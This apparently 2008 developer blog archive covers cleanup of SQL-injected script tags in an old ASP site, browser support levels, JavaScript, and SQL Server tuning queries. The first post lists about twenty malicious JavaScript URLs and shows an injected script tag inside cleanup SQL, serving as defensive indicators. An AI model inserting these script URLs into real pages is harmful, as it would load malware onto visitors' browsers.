Tuesday 23 September 2008

Latest SQL Injection URLS

Cleaning up a site infected with multiple SQL injected URLs

I have just had to clean up an ancient system that had been successfully hacked by automated hack bots. The site was a small news system, written about 7 years ago and rarely visited. The code was ASP classic and all the SQL was client side, built with string concatenation, with poor parameter sanitisation and no thought paid to SQL injection at all. Luckily the site owner is moving to a new system this week, however I still had to clean the database up, and the main affected table contained at least 20 different script tags, some appearing more than 5 times, all referencing dodgy URIs. In fact, by the looks of things, the majority of the site's traffic over the last month was purely from hack bots, which just goes to show that no matter how small a site is, if it can be found on the web then a hack bot is going to try its luck. Luckily I managed to remove all traces of the hack using my clean up script and there was no need to restore from a database backup.
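For anyone facing the same clean up, this is a minimal sketch of the sort of statements my script runs, assuming a hypothetical ARTICLES table with a varchar Content column and the unquoted form the tags were injected in (the real script loops over every text column in every table):

-- find rows that still contain one of the injected script tags
SELECT ArticlePK, Content
FROM ARTICLES
WHERE Content LIKE '%<script src=http://www.usaadp.com/ngg.js></script>%'

-- strip the tag back out again (Content is assumed to be (n)varchar; text columns would need casting first)
UPDATE ARTICLES
SET Content = REPLACE(Content, '<script src=http://www.usaadp.com/ngg.js></script>', '')
WHERE Content LIKE '%<script src=http://www.usaadp.com/ngg.js></script>%'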

However I thought it would be helpful to list out all the URIs injected into the system.
As you can see most are Russian with a few Chinese thrown in for good measure, so nothing new there. They all caused Google's vulnerable site report to raise a flag, and I believe the JS is the standard hack that makes use of the well known iframe vulnerabilities in old browsers.

http://www0.douhunqn.cn/csrss/w.js
http://www.usaadp.com/ngg.js
http://www.bnsdrv.com/ngg.js
http://www.cdport.eu/ngg.js
http://www.movaddw.com/ngg.js
http://www.lodse.ru/ngg.js
http://www.sdkj.ru/ngg.js
http://www.kc43.ru/ngg.js
http://www.jex5.ru/ngg.js
http://www.bnrc.ru/ngg.js
http://www.bts5.ru/ngg.js
http://www.d5sg.ru/ngg.js
http://www.nemr.ru/ngg.js
http://www.kr92.ru/ngg.js
http://www.bjxt.ru/ngg.js
http://sdo.1000mg.cn/csrss/w.js
http://www.ujnc.ru/js.js
http://www.cnld.ru/js.js
http://www.juc8.ru/js.js
http://www.3njx.ru/js.js
http://www.19ssl.net/script.js
http://www.vtg43.ru/script.js

See my recovering from an SQL injection attack post for more details about clean ups and quick plasters that can be applied to prevent further injections.

Thursday 18 September 2008

What browser support do you offer your users?

Graceful degradation

In an ideal world you would want any website you develop to reach as large an audience as possible. Sites these days can rely on multiple technologies to work (JavaScript, Flash, Java, ActiveX, CSS), most of which the user can disable by choice even when their browser supports them. This means that when it comes to developing a site you have a decision to make. You can draw a line in the sand and say "you must use this browser, above this version, with JavaScript, Flash and ActiveX enabled" for the site to work, which will mean a small and very annoyed audience. Or you can take the better route and build the site from the bottom up, starting with a good core HTML structure that should work in all browsers and then adding layers of functionality on top.

This means making sure all links have href attributes that point to URIs and not javascript:, images have alt attributes, client side validation is duplicated on the server (which is good practice anyway as it stops hackers bypassing it by disabling JavaScript) and that the core navigation does not rely on JavaScript to work. This is called graceful degradation and ensures that your site's core functionality is available to as many users as possible.

For example, if you were displaying Flash banners you would start with an image that has its alt attribute defined, so that a user with a text based browser reads the alt content, a user with image support sees the image, and a user with Flash enabled views the movie.

The site I am currently working on divides browser support into 3 levels, and to help the user we include a browser compatibility page that shows what level of support their browser and settings give them, along with links to download the latest version of their browser if they are on an old one. As well as showing the browser support level (see below), the page lists a number of key settings and features that the site makes use of with an indicator of whether each one is enabled or not. Settings displayed include Flash, JavaScript, AJAX, Java, Cookies etc. Having one or more items on this list unavailable does not mean the site will not function, only that certain parts of the site use that technology, so to get the richest experience from the site and enjoy all the functionality the user should enable the missing features. Obviously there are some items that have to be available for the site to work, such as forms and session cookies, and we let the user know whether their browser and settings are compatible with the site by showing crosses or ticks next to each item along with an overall compatibility rating.

Browser support levels

The browser support grades are defined in the following way.

Level 1 Support
This means that the site should be fully functional and display correctly. We test the site fully in level 1 browsers to make sure any bugs are fixed as soon as possible. Currently our level 1 browsers are IE 7 and 6, Firefox 2 (3 is still buggy), Safari 3 and Opera 9.

Level 2 Support
This means browsers that should work without any problem with our software, but as we cannot test every single available browser we cannot guarantee that everything will work. For example, if the browser is the latest version of SeaMonkey or Firebird, which are based on the same Gecko rendering engine as Firefox (a level 1 browser), then the system should work perfectly depending on your browser settings. However, as we do not fully test the system with these browsers we do not guarantee they will work 100%. Current level 2 browsers would be Firefox 3, Opera 8, SeaMonkey and Konqueror.

Level 3 Support
This means older or niche browsers, such as those on PDAs and mobile phones, that we do not test the system on. This is not to say the system won't work, as it might do depending on your browser settings. However we are not going to test our system on Netscape Navigator 4 or every mobile phone to ensure it works.

A fully functional site means no JavaScript errors, although the JavaScript is not really the problem as most code that works in IE 7 is going to work in IE 5, and we all try to write cross browser code nowadays, which is made easier by all the libraries available. The issue is more to do with CSS and all the quirks between IE and Mozilla and the various versions. IE 6 for instance has a number of major differences which mean special stylesheets or hacks have to be implemented. As much as we would like to downgrade IE 6 to a level 2 browser we cannot, due to the simple fact that a number of our largest clients still use IE 6 as their browser. We have enquired about the possibility of them upgrading but were actually told that their technical support team would not allow it, which is understandable if you consider how much support time would be taken up by requests for help because of the new browser layout. I can imagine they don't want to suffer the hundreds of phone calls asking "where has the history menu disappeared to?"

I also have Firefox 3 in level 2 due to the fact that there are still a number of outstanding issues with the site which need resolving before we would make it level 1. Some of these issues are definitely a problem with the browser, such as the well known problem playing Flash videos, for which the only workaround I have found is an upgrade to Flash 10. There is also an issue with the execCommand function which I am not sure about, as the code worked fine in Firefox 2 and other browsers but has suddenly started giving me "Component returned failure code: 0x80004003 (NS_ERROR_INVALID_POINTER) [nsIDOMNSHTMLDocument.execCommand]" errors in the iframe based wysiwyg editor the site uses.

Current browser usage

I like to occasionally look at the traffic statistics to see whether our grading of browsers over 3 levels is in keeping with actual Internet use.

The system I am logging against is recording on average 350,000 page loads a day at the moment, roughly 50-60% of which are from crawlers, which is nothing out of the ordinary. Looking only at traffic from site members who have logged into the website, as opposed to visitors in general, the browser breakdown for this month so far is:

Browser       %
IE 7.0        61.56
IE 6.0        27.21
Firefox 3.0   5.44
Firefox 2.0   3.06
Safari 3.1    2.72

This is no great surprise and shows how much market share IE 6 still has, even after 2 years of IE 7 being around.

As for obscure and old browser versions, would you be surprised to know that for today alone the following browsers appeared in the stats for non-crawler traffic:

  • 62 different people used IE 5.0 and 1 came along in IE 4!
  • 5 visited on various versions of Netscape Navigator 4.
  • Across all users to the site, Yandex, the Russian search engine, came third after IE 7 and 6.
  • There were over 100 different browser/version combinations recorded today alone.

Although not earth shatteringly exciting, it does show the breadth of browser types out there and also that a large majority of users do not seem to upgrade very often, some not at all by the looks of things. With new versions of browsers rolling out all the time it would be practically impossible to test a site in each one, but if your site works in the major 4 rendering engines (IE/Trident, Firefox/Gecko, Safari/WebKit, Opera/Presto) then you will be covering the majority of those users who do keep up to date with browser revisions.

Sunday 14 September 2008

My growing love for Javascript

A shaky start to the love affair

I have no shame in admitting that I am currently in love with JavaScript. It may be that for the last eon or two I have been working with clunky old scripting languages such as ASP classic, and whenever I get a chance to do some JavaScript I grab it with open arms as an opportunity to do what seems like proper programming. I will be the first to admit that I never used to see JavaScript in the way I do now; as well as never understanding its full potential, I never even thought of it as a proper object oriented language, which it most certainly is. When I first swapped over from client/server applications in the early 90's to web development using ASP/COM/SQL Server 6, JavaScript was just a nice little scripting language that could set the focus of inputs, validate input client side and do other little tweaks that didn't seem of much importance in the grand scheme of things. The "proper" coding was done server side and I would have traded my ciggies by the dozen with anyone to work on a stored procedure or COM component rather than have to fiddle round with a scripting language that I had little time or patience for.

Coming from a VB background I hated the problems of case sensitivity and having to remember that equality tests involved more than one equals sign, sometimes even three. Trying to debug a script was always a nightmare: sitting there clicking away all those alert boxes before realising you were in some sort of never ending loop and having to kill the browser and start again. Yes, I really didn't think much of it, and I am certainly not alone in feeling like that.


The love that grew from necessity.

So over the years my views on JavaScript changed from hatred to a mild respect, still outweighed by all the annoyances that come with trying to write a fully functional script that is complex and cross browser at the same time. I still didn't have to work with it that much apart from replicating server side form validation on the client and some mild DOM manipulation. My annoyance with the language itself had disappeared after I learnt Java and C#, and the scripts that I did have to knock out were not that complex, however I still had the attitude that if it worked in the browser I was using, which was always the latest version of Internet Explorer, then the script was fine by me. If it didn't work in Netscape or Safari then I would just ask the office "JavaScript guru" to have a look, and the code I was given usually seemed to work even if I didn't know what it was doing.

Then the other year I wanted to implement a WYSIWYG editor for the system I was working on. The system was using FCKEditor at the time and I wanted to implement what seemed like a simple request: a character counter, so that as the user typed, the number of characters used in the HTML source was available for viewing. I remember trying to edit the FCK source and realising what a huge beast it was; the size of its directory was ten times the size of the rest of the site, and I was sure that half the code and functionality was not required for my system's requirements. I had a look at some other widgets, including OpenWYSIWYG and another one that our JavaScript guru had used, and then I decided to write my own, combining the best bits of each, stripping out anything not needed, adding my character counter and making it as flexible as possible. It seemed like a straightforward task on paper, but it was the start of a painstaking development and, more importantly, the start of a long learning process which, although extremely painful at the time, opened my eyes to the wonders of cross browser coding and all the different caveats and pitfalls that were waiting for me to discover.


Items of interest discovered along the way.

Whilst developing this widget some of the most seemingly simple things turned out to be the most complex. Who would have thought that just putting the cursor at the end of the content in the iframe editor would be such a tall order? As well as learning far too much about browser differences, the history of Netscape and Mozilla and why user agent strings seem to make so little sense, I found out some very important information and came across some specific problems that everyone hits at some stage when developing cross browser script.

1. How Firefox is indeed a wonderful invention with all those extensions, especially Firebug, which made my debugging life pain free once again. Not only that, but Firebug Lite brings most of that joy to debugging in IE. No more tired fingers from closing alert boxes.

2. The problems with relative URIs displayed within Iframes in Internet Explorer. Read this article for an explanation. The solution was to write out the Iframe content with document.write.

3. Different implementations of content editable HTML between browsers. Issues setting design mode on in Mozilla and disappearing event listeners. All good fun for the clueless I can assure you.

4. All the fun involved in learning about the event model and the problem of the "this" keyword in IE, as well as the memory leaks in older IE versions and the illogical order in which IE fires events.

5. Differences between browsers when trying to calculate the size of the viewport and window dimensions for making my editor appear in a floating div.

6. Trying to make the content outputted by the editor as consistent as possible across browsers and XHTML compliant. IE seems to love capital letters and forgetting to close LI and DT elements for some reason.

7. Much much more.

So as you can see, if you have covered all those topics in detail yourself, which means you will most certainly have read Dean Edwards' competition blog article from start to finish as well as followed most of the links it leads to, this is a lot of information to take in and understand. However, rather than put me off JavaScript for life, it's actually made me come to love the bloody thing.


Conclusion

So whereas in the 90's I used to hate all those cross browser problems, they are more of a challenge to be overcome now, and I love it when I get a complicated piece of code working in the main 4 browsers as well as in as many old versions as possible. In fact I may get a little too keen sometimes and often need my colleagues to tell me that the widget doesn't actually need to work in Netscape Navigator 4 or IE 4.

I am one of those people who will readily admit that I don't know everything, but I like finding out about those missing chunks of knowledge, and when given the choice of an easy life by implementing someone else's code as is, I will now often choose the more painful but more enjoyable option of trying to write my own version. I will have a look at some of the best examples out on the web and try to put them all together, which is usually the best way of learning about all those nice little cross browser intricacies along the way.

As the saying goes nothing worthwhile in life comes easily and this seems to be particularly true with writing cross browser JavaScript code.

Tuesday 9 September 2008

SQL Performance Tuning Queries

SQL 2005 Performance Tuning Queries

Here are some of my favourite queries that help with SQL performance tuning.
I have gathered most of these from the web and 3rd party sources over the years, with the odd tweak here and there where needed, and they form the bulk of my performance tuning toolkit. You should keep a file containing a number of similar queries close at hand as they are invaluable for hunting down problematic queries or even SQL injection or DoS attacks.

Update: 07-Dec-08
In response to the comment about filtering by db_id() I have removed that filter from a few of the examples, as he is correct in stating that filtering by db_id() will not return all the possible data and will miss queries run from the client or from within stored procs that use dynamic SQL. Also, if you are in a hurry and want to skip to a very useful procedure that will output nearly 20 different performance related reports for one or more databases, then go straight to this download of mine: Download SQL 2005 Performance Reports.


Top 50 worst queries for I/O

There are 2 different kinds of I/O tracked within SQL Server: logical and physical. Logical I/Os account for data that is read from the buffer pool, which resides in memory, hence the term logical I/O. Physical I/Os are those associated with accessing data directly from the physical disks that SQL Server uses to store databases, and they are the more expensive of the two, meaning they take longer to process. I/O is generally the single most expensive operation affecting the overall performance of a TSQL statement, so when you are tuning your queries you want to minimise the number of logical and physical I/O operations performed to produce a result set.

If your query shows physical I/O on the first run but none on the second, it's because SQL Server is holding the data in memory, so to re-test from disk you need to clear the buffer cache using DBCC DROPCLEANBUFFERS.

SELECT TOP 50
(qs.total_logical_reads + qs.total_logical_writes) /qs.execution_count as [Avg IO],
substring (qt.text,qs.statement_start_offset/2,
(case when qs.statement_end_offset = -1
then len(convert(nvarchar(max), qt.text)) * 2
else qs.statement_end_offset end - qs.statement_start_offset)/2)
as query_text,
qt.dbid,
qt.objectid
FROM sys.dm_exec_query_stats qs
CROSS APPLY sys.dm_exec_sql_text (qs.sql_handle) as qt
ORDER BY [Avg IO] DESC


Top 50 worst queries by average running time

The following query will list the worst performing queries based on their average elapsed running time. It will give you the times, logical & physical reads and the TSQL of the statement in question.

SELECT TOP 50
creation_time,last_execution_time,total_physical_reads
,total_logical_reads,total_logical_writes, execution_count
,total_worker_time, total_elapsed_time, total_elapsed_time / execution_count
avg_elapsed_time, SUBSTRING(st.text, (qs.statement_start_offset/2) + 1,
((CASE statement_end_offset WHEN -1 THEN DATALENGTH(st.text) ELSE
qs.statement_end_offset END - qs.statement_start_offset)/2) + 1) AS statement_text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) st
ORDER BY total_elapsed_time / execution_count DESC;


Top 50 worst queries by CPU

This query is similar to the previous one in the DMVs (dynamic management views) it uses, but it returns the most CPU intensive queries in the system. If you are seeing high CPU spikes or top end flatlining on your database server then this query will help you find out whether you are being hit by a SQL denial of service attack, or whether you have some queries using pattern matching techniques (LIKE, PATINDEX, CLR regular expressions) that have been given a complex string to search for and have maxed out the CPU.

SELECT TOP 50 (a.total_worker_time/a.execution_count) AS [Avg_CPU_Time],
Convert(Varchar,Last_Execution_Time) AS 'Last_execution_Time',
Total_Physical_Reads,
SUBSTRING(b.text,a.statement_start_offset/2,
(case when a.statement_end_offset = -1 then len(convert(nvarchar(max), b.text)) * 2
else
a.statement_end_offset end - a.statement_start_offset)/2) AS Query_Text,
db_name(b.dbid)as DatabaseName,
b.objectid AS 'Object_ID'
FROM sys.dm_exec_query_stats a
CROSS APPLY sys.dm_exec_sql_text(a.sql_handle) AS b
ORDER BY [Avg_CPU_Time] DESC


Suggested index columns and usage

SELECT d.*
,s.avg_total_user_cost
,s.avg_user_impact
,s.last_user_seek
,s.unique_compiles
FROM sys.dm_db_missing_index_group_stats s
,sys.dm_db_missing_index_groups g
,sys.dm_db_missing_index_details d
WHERE s.group_handle = g.index_group_handle
AND d.index_handle = g.index_handle
AND database_id = db_id()
ORDER BY s.avg_user_impact DESC

View index usage by table

Ideally you want high figures in the user_seeks column.
If you have no seeks and lots of lookups then you should investigate. Also if you have indexes with no seeks, scans or lookups then they should be dropped as the index is not being used.

SELECT i.Name, i.Type_Desc, i.Is_unique, d.*
FROM sys.dm_db_index_usage_stats as d
JOIN sys.indexes as i
ON i.object_id = d.Object_id and
i.index_id = d.Index_id
WHERE database_id=db_id()
AND d.object_Id=object_id('JOBS')

View the fragmentation levels of your In Row (non blob/text) indexes


SELECT object_name(d.object_id), d.object_id, d.index_id, i.name as IndexName,
avg_fragmentation_in_percent, alloc_unit_type_desc
FROM sys.dm_db_index_physical_stats (db_id(), NULL, NULL, NULL, NULL) as d
JOIN sys.indexes as i
ON i.object_id = d.object_id and
d.index_id = i.index_id
WHERE d.Index_Type_Desc <> 'HEAP' AND
i.Name is not null AND
avg_fragmentation_in_percent>= 30 --change this figure to reflect your own requirements
ORDER BY object_name(d.object_id)


Finds the degree of selectivity for a specific column in a table

The higher the ratio, the more selective the column is and the more worthwhile an index becomes. There is no point having indexes on columns with low selectivity, as they would not help differentiate between rows when 50% of rows hold one value and 50% another. This is the reason it's not a good idea to place indexes on bit columns, as there are only two possible values. The only exception would be when a very high percentage of rows hold one value (99% true) and you want to find the 1% that hold the opposite value (false), but even then I would advise against it.


Declare @total_unique float
Declare @total_rows float
Declare @selectivity_ratio float

SELECT @total_unique = 0
SELECT @total_rows = 0
SELECT @selectivity_ratio = 0

/*
Finds the total number of unique values in the column
Be sure to replace ClientFK below with the name of your column
Be sure to replace JOBS below with your table name
*/
SELECT @total_unique = (SELECT COUNT(DISTINCT ClientFK) FROM JOBS)

/*
Calculates the total number of rows in the table
Be sure to replace JOBS below with your table name
*/
SELECT @total_rows = (SELECT COUNT(*) FROM JOBS)

--Calculates Selectivity Ratio for a Specific Column
SELECT @selectivity_ratio = ROUND((SELECT @total_unique/@total_rows),2,2)
SELECT @selectivity_ratio as 'Selectivity Ratio'



So those are a few of my favourite queries that I use very frequently to help hunt down and resolve back end performance bottlenecks. Since SQL 2005 came out with all these really cool DMVs a lot of people have spent time putting these sorts of queries together into one report.

If you want to get your hands on one of these all encompassing queries then check out the following stored procedure which uses a query I came across and extended to make it more customisable:


It's a beast of a report but it gives you everything you need to know in one place. Read the comments before each section carefully so you understand what the data is showing you. Also, if you run the report as it is on a server with lots of databases, tables, indexes etc it will take some considerable time to execute, so I suggest using one of the modes that lets you filter on only those databases you require statistics for. So call it like so:

EXEC dbo.usp_sql_rpt_database_performance_stats 3, 'strictlysoftware%'

will only report on databases on that server whose name (in sys.databases) starts with strictlysoftware. You will most likely also want to exclude the system databases (master, msdb, model), although you may want to report on tempdb, so call it like so:

EXEC dbo.usp_sql_rpt_database_performance_stats 1, NULL

Another script that contains some useful code related to blocking and wait times can be found at Microsoft's site. The code is near the bottom of the page.



So there you go, a one stop shop of goodies that should help you on your way. Please let me know if you have other useful DMV related queries or anything specific to SQL 2008, which is coming our way soon.

SQL Performance Top Tips

Another SQL Performance Top Tips?

I know there are lots of top tips for improving SQL performance out there on the web, but you can never have too much of a good thing, so I have created my own list of issues to identify and resolve when trying to improve the performance of a SQL database.


1. Investigate and resolve deadlocks or blocked processes.


All it takes is one blocked process on a commonly hit table for your whole site to hang and start reporting timeout issues.

On my jobboard sites I had locking issues with my main JOBS table that had to be joined to a number of other tables to get the data needed on results pages that were hit constantly by crawlers. These tables were also being updated constantly by clients and automated feeds from multi-posters which meant that locks were likely.

As I use one database for multiple sites it also meant that a lock caused by one site would cause timeout issues for the other sites.

To resolve this I created some de-normalised flat tables per site that contain all the fields needed for reporting and searching which meant:

  • The flat table is only refreshed at regular intervals rather than instantly. SQL 2005 introduced the synonym feature, which I demonstrate here; it is used to swap between the table being built and the table in use by the site, so that a new table can be built behind the scenes with up to date data.
  • Clustered indexes can be site specific, depending on the columns that site searches on the most.
  • No joins needed when accessing the table and results are returned very fast.
  • Any problems accessing this table do not affect other sites.
Another trick for handling instances where you are selecting from tables that may be updated constantly, such as job or banner hit tables, is to look at the following:
  1. If the table you are selecting from is never updated or deleted from during the times you are selecting from it, then you can use the WITH (NOLOCK) hint on your SQL SELECTs. You won't have to worry about dirty reads as you are not actually updating the data, and you bypass all the overhead SQL Server has to go through to maintain the locking.
  2. Use the SET LOCK_TIMEOUT statement to reduce the time your statements wait on blocked resources before giving up.
  3. Use the TRY / CATCH statement to catch deadlocks and other blocking errors in combination with a retry loop; after X retries return from the proc. View my example of using LOCK_TIMEOUT to handle DEADLOCKS and BLOCKING, and see the sketch after this list.
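To illustrate points 2 and 3, here is a minimal sketch of such a retry loop; the JOBS update, the JobPK and ViewCount columns and the retry count are just assumptions for illustration:

DECLARE @Retry int, @MaxRetries int, @ErrorMsg nvarchar(2048)
SELECT @Retry = 1, @MaxRetries = 3

SET LOCK_TIMEOUT 5000 -- give up waiting for a lock after 5 seconds (error 1222)

WHILE @Retry <= @MaxRetries
BEGIN
   BEGIN TRY
      UPDATE JOBS
      SET ViewCount = ViewCount + 1
      WHERE JobPK = 12345

      BREAK -- success so exit the loop
   END TRY
   BEGIN CATCH
      IF ERROR_NUMBER() IN (1205, 1222) AND @Retry < @MaxRetries
         SET @Retry = @Retry + 1 -- deadlock victim or lock timeout so try again
      ELSE
      BEGIN
         -- a different error, or out of retries, so re-raise and give up
         SET @ErrorMsg = ERROR_MESSAGE()
         RAISERROR(@ErrorMsg, 16, 1)
         BREAK
      END
   END CATCH
END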



2. Look into large batch processes that have long run times, take up I/O, have long wait times or cause blocking.

A good example is where you have to transfer lots of records from one table to another e.g from a daily table that only receives INSERTS (e.g job / banner hits) into a historical table for reporting.

If you are deleting large numbers of records from a table that is also in use then you don't want to cause blocks that will freeze your site. In conjunction with point 1 you should look into how you handle your DELETE / UPDATE statements so that they are done in small batches using the SQL 2005+ TOP command.

Read this article for an example of updating or deleting in batches to prevent blocking; a minimal sketch is also shown below.
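As a rough guide, this is the kind of batched DELETE I mean; the JOB_HITS table, the date filter and the 5,000 row batch size are just assumptions:

DECLARE @BatchSize int
SET @BatchSize = 5000

WHILE 1 = 1
BEGIN
   -- delete a small chunk at a time so locks are only held briefly
   DELETE TOP (@BatchSize)
   FROM JOB_HITS
   WHERE HitDate < '2008-08-01'

   IF @@ROWCOUNT = 0
      BREAK -- nothing left to delete

   WAITFOR DELAY '00:00:01' -- give other processes a chance to get in
END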

To identify problematic queries after the fact you can utilise the SQL 2005+ Dynamic Management Views (DMVs), which hold key information about the system.

Read this article on my top queries for performance tuning to help identify those queries that need tuning.


3. Re-Index and De-Frag tables

Make sure you regularly re-index and de-fragment your tables, as over time fragmentation will build up and performance will be affected. I tend to set up a weekly MS Agent job that runs a re-organise or rebuild on indexes with fragmentation over a set percentage, as well as updating index statistics.

I then also try to schedule a full re-index of all my main tables once a quarter at scheduled down times, as during a full rebuild the tables can be taken offline depending on your SQL Server edition and settings.
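If you want to script it yourself rather than use a maintenance plan, this is a minimal sketch that reorganises lightly fragmented indexes and rebuilds anything over 30%; the thresholds are just my assumptions and it presumes your tables live in the dbo schema:

DECLARE @SQL nvarchar(max)
SET @SQL = N''

-- build one ALTER INDEX statement per fragmented index
SELECT @SQL = @SQL +
   N'ALTER INDEX ' + QUOTENAME(i.name) + N' ON ' + QUOTENAME(OBJECT_NAME(s.object_id)) +
   CASE WHEN s.avg_fragmentation_in_percent > 30
        THEN N' REBUILD;'      -- heavy fragmentation so rebuild
        ELSE N' REORGANIZE;'   -- light fragmentation so just reorganise
   END + CHAR(10)
FROM sys.dm_db_index_physical_stats(DB_ID(), NULL, NULL, NULL, 'LIMITED') AS s
JOIN sys.indexes AS i
   ON i.object_id = s.object_id AND i.index_id = s.index_id
WHERE s.avg_fragmentation_in_percent >= 10 -- ignore anything below 10%
  AND s.index_type_desc <> 'HEAP'
  AND i.name IS NOT NULL

EXEC sp_executesql @SQL

-- keep the optimiser statistics fresh as well
EXEC sp_updatestats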


4. Identify Slow Queries

Investigate your slowest running queries to make sure they are covered adequately by indexes, but also try not to overuse indexes. Try to cover as many queries with as few indexes as possible.

Try running this SQL performance report which will identify a dozen or so areas which could be improved on your system including:


  • Causes of the server waits
  • Databases using the most IO
  • Count of missing indexes, by database
  • Most important missing indexes
  • Unused Indexes
  • Most costly indexes (high maintenance)
  • Most used indexes
  • Most fragmented indexes
  • Most costly queries, by average IO
  • Most costly queries, by average CPU
  • Most costly CLR queries, by average CLR time
  • Most executed queries
  • Queries suffering most from blocking
  • Queries with the lowest plan reuse

This is an invaluable tool for any SQL DBA or SQL performance tuning developer.



5. Split tables

If your tables are used for inserting and updating as well as selecting, then every index you have on a table is an extra update required each time a record is saved. On some of my big tables that are used heavily for reporting I split the data into daily and historical data. The daily table allows updates but the historical table does not.

At night a job transfers the daily data into the historical table, dropping the current indexes, loading the new data and then rebuilding the indexes with a 100% fill factor; a rough sketch is shown below. You need to balance whether speed of retrieval or speed of updates is more important if the table is used for both. You should also look at points 1 and 2 about managing blocking and batching updates/deletes to handle instances where a table is being deleted from whilst being accessed at the same time.
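This is only a minimal sketch of that kind of nightly transfer; the JOB_HITS and JOB_HITS_HISTORY tables, their columns and the index name are all assumptions:

-- drop the reporting index so the bulk insert is not slowed by index maintenance
DROP INDEX IX_JOB_HITS_HISTORY_HitDate ON JOB_HITS_HISTORY

-- move the day's data across
INSERT INTO JOB_HITS_HISTORY (JobFK, HitDate, Referrer)
SELECT JobFK, HitDate, Referrer
FROM JOB_HITS

-- clear the daily table ready for the next day
TRUNCATE TABLE JOB_HITS

-- rebuild with a 100% fill factor as the history table is read only between loads
CREATE NONCLUSTERED INDEX IX_JOB_HITS_HISTORY_HitDate
ON JOB_HITS_HISTORY (HitDate)
WITH (FILLFACTOR = 100)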


6. Re-write complex queries and make WHERE clauses SARGABLE

Can you rewrite complex queries to be more efficient? Can you remove LEFT JOINs to large tables by populating temporary tables first? Are you putting functions around columns in the WHERE or HAVING clause and negating any index usage? If so, can you rewrite the clause and make it SARGABLE so that you make use of the index? For example a WHERE clause like this:

WHERE DateDiff(day,CreateDate,GetDate()) = 0

which is filtering by today's date, should be rewritten to:


WHERE CreateDate >= '2008-sep-09 00:00:00' --where this is the previous midnight

Put the value from GetDate() into a variable before the SELECT and then use that in the filter, so that no function is wrapped around the column and any index on CreateDate will be available, for example:
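A minimal sketch, assuming the JOBS table with a Title column just for illustration:

DECLARE @Midnight datetime
SET @Midnight = DATEADD(day, DATEDIFF(day, 0, GETDATE()), 0) -- today at 00:00:00

SELECT JobPK, Title
FROM JOBS
WHERE CreateDate >= @Midnight -- no function around the column so an index on CreateDate can be used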

Read this article of mine which proves the benefits of SARGABLE clauses in SQL.


7. Query Plan Caching

Check that you are benefiting from query plan caching. If you are using stored procedures that contain branching through use of IF statements that run different SQL depending on the values passed in by parameters then the cached query plan for this procedure may not be the best for all parameter variations.

You can either rewrite the procedure so that each IF branch calls another stored procedure containing the query required, as it is that procedure's plan that gets used.

Or you could rewrite the query as dynamic SQL, building up a string containing the appropriate syntax and parameters, and then execute it using sp_executesql, which will take advantage of plan re-use. Do not use EXEC as this will not take advantage of plan re-use and it's not as safe in terms of SQL injection.
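As a rough guide, a minimal sketch of the sp_executesql approach, re-using the PRODUCTS example from further down (the Name column is just an assumption):

DECLARE @SQL nvarchar(500)
SET @SQL = N'SELECT ProductID, Name FROM PRODUCTS WHERE ProductID = @ProductID'

-- the plan for this statement can be re-used for any @ProductID value
EXEC sp_executesql @SQL, N'@ProductID int', @ProductID = 10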

You should also look into whether your query plans are not being re-used due to your SQL Server settings, as the default mode is SIMPLE PARAMETERIZATION rather than FORCED PARAMETERIZATION.

This feature takes ad hoc queries containing literal values and replaces those values with parameters. This means that the cached query plan can be re-used for similar queries that have different values, which can aid performance as it reduces compilation time.

When the system is set to SIMPLE mode, only ad hoc query plans that contain the same literal values get cached and re-used, which in many cases is not good enough as the values for most queries change all the time. For example, in SIMPLE mode only the plan for the exact query below will be cached.


SELECT *
FROM PRODUCTS
WHERE ProductID = 10

This means only products with a ProductID of 10 will benefit from the cached plan, however with FORCED PARAMETERIZATION enabled you would have a plan with parameters, so that a query for any ProductID can benefit from it e.g


SELECT *
FROM PRODUCTS
WHERE ProductID = @1 -- name of SQL parameter
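The setting itself is changed per database; for example (MyDatabase is just a placeholder name):

ALTER DATABASE MyDatabase SET PARAMETERIZATION FORCED

-- and to put it back to the default
ALTER DATABASE MyDatabase SET PARAMETERIZATION SIMPLE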


For a more detailed look at the benefits of this method read my article on forced parameterization.


8. Use the appropriate table for the situation

SQL Server has a variety of table types, from fixed permanent tables to global and local temporary tables to table variables, the latter two of which are both stored in tempdb.

I have found a number of times now that table variables start off being used in stored procedures as very useful, memory efficient storage mechanisms, but once the datasets stored within them rise above some threshold (I have not found the exact figure yet) performance drops off dramatically.

Whilst useful for array-like behaviour within procs and quick for small datasets, they should not be used with recordsets of many thousands or millions of records. The reason is that no indexes can be added to them, so any joins or lookups will result in table scans, which are fine with 10-100 records but with 20 million will cause huge problems.

Swapping table variables for either fixed tables or temporary tables with indexes should be considered when the size of the data is too great for a table variable, for example:
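A minimal sketch of that swap, with the table, column and index names just assumptions for illustration:

-- instead of: DECLARE @Results TABLE (JobFK int, ClientFK int)
CREATE TABLE #Results
(
   JobFK int NOT NULL,
   ClientFK int NOT NULL
)

-- temporary tables can be indexed, so joins can seek rather than scan
CREATE CLUSTERED INDEX IX_Results_JobFK ON #Results (JobFK)

INSERT INTO #Results (JobFK, ClientFK)
SELECT JobPK, ClientFK
FROM JOBS

-- ... joins and lookups against #Results go here ...

DROP TABLE #Results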

If your procedures are being called by website logins with execute permission only, you will need to impersonate a login with higher privileges to allow the DDL statements CREATE and DROP, as a basic website login should have nothing more than read privileges to help prevent SQL injection attacks.

If you don't want to risk the rise in privileges then consider using a fixed table and the use of a stamp and unique key so that multiple calls don't clash with each other. Appropriate indexes should be used to ensure speedy data retrieval from these tables.

A real world example I have found is explained in this article on speeding up batch processes that use table variables.


9. Tuning for MySQL

MS SQL Server has a vast array of useful tools to help you performance tune it, from its Dynamic Management Views and Activity Monitor to its detailed query execution plans. However if you are using MySQL and have to suffer a tool like Navicat then you are not in such a good position to tune your queries.

The EXPLAIN statement is nowhere near as useful as the MS SQL query execution plan, but it can be used to check that the appropriate indexes exist and are being used, and the slow query log is a useful place to identify problematic queries.
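A quick sketch of both; the table and column names are assumptions and the my.cnf settings shown are the MySQL 5.0 era ones:

-- check which index, if any, a suspect query is using
EXPLAIN SELECT JobPK, Title
FROM JOBS
WHERE CreateDate >= '2008-09-01';

-- the slow query log is switched on in my.cnf, e.g.
-- log-slow-queries = /var/log/mysql/slow.log
-- long_query_time  = 2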

If you are using LINUX or Wordpress and running your system on MySQL then read this article of mine on performance tuning for MySQL.


These are just some tips to look at when trying to improve back end database performance and I will add to this list when I get some more time. Feel free to post your own tips for identifying problematic SQL and then fixing it.

Monday 8 September 2008

Top 10 Tips for improving ASP performance

Top 10 Tips For Speeding up ASP Classic Sites

